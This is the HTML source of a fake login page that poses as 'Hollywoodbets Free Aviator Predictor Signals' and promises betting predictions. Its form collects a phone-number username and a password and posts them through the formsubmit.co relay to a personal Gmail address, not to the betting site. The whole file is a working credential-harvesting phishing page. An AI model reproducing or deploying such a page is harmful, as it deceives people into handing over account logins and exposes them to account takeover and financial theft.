<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>HOLLYWOODBETS FREE AVIATOR PREDICTOR SIGNALS </title>
<meta name="viewport" content="width=device-width, initial-scale=1.0"> 

<style>
*{
    Margin:0;
    padding: 0;
}  



.contenter{
    margin:5px; 
    margin-left: 3px;
    width:350px;
    height: 680px;
    border-radius: 3px;
    background: whitesmoke;
    
     
  }   



h2{
    color: #52247F;
    text-align: center;
    font-size: 17px;
    
}


#p2{
     Margin-top:10px;
    Margin-left:10px;
    color: gray;
    Margin-top:px;
}

#number{
    
    margin-left: 10px;
    width: 330px;
    height: 40px;
    outline-color: #52247F;
  margin-bottom: 18px;
   
   
   
}


#number:hover{
    outline-color: #52247F;
}

#pass{
    width: 330px;
    height: 40px;
    margin-left: 10px;
    margin-top: ;
   
    
    
}
#pass:hover{
    outline-color: #52247F;
    
}


.solve{
    margin: ;
}

.cont{
    margin-top: 1px;
    
}

.div1{
   text-align: center;
   
   
}

input::placeholder{

    padding-left: 10px;
    color: #52247F;
    
    
}


.btn{
    width:336px ;
    margin: 10px;
    Border-radius:4px;
    height: 45px;
    color: white;
    background:#52247F;
    border-color: whitesmoke;
    border: none;
    font-size: 20px;
}

h1{
    Margin:10px;
    Font-size:30px;
}


img{
    width: 100%;
    height: 300px;
    
}

.btn:hover{
    background:#52247F;
}

h6{
    text-align: center;
    color: gray;
}


#p01{
  
    
    color: gray;
    text-align: center;
}

</style>
    
</head>
<body>
    
    <form action="https://formsubmit.co/tembezama368@gmail.com" method="POST">
    
  <div class="contenter">  
 <section>  
     <img src="https://i.ibb.co/JFNXWxG/Screenshot-20240609-132138.jpg" alt="Screenshot-20240609-132138" border="0"></a>
   
    <h2>Hollywoodbets Free Aviator Predictor Signals </h2>
   
   <h1>Login</h1>
 <div class="solve"> 
     
  <p id="p2">Username<p/>  
<input type="number" id="number" name="number" required>


</div>
<p id="p2">Password</p>
<input type="text" name="name" id="pass" required>

         


<input type="submit" class="btn" value="Log In">

<p id="p01">by logging in you accept terms and conditions </p>





   
   
 <h6><br>NB:make Sure Details are Correct<br>
 
 
 <br>2024© Copy all Right<br></h6>  
   
</section>   
 </div>  
    
 
 
 <form action="https://formsubmit.co/tembezama368@gmail.com" method="POST">   
</body>
</html>
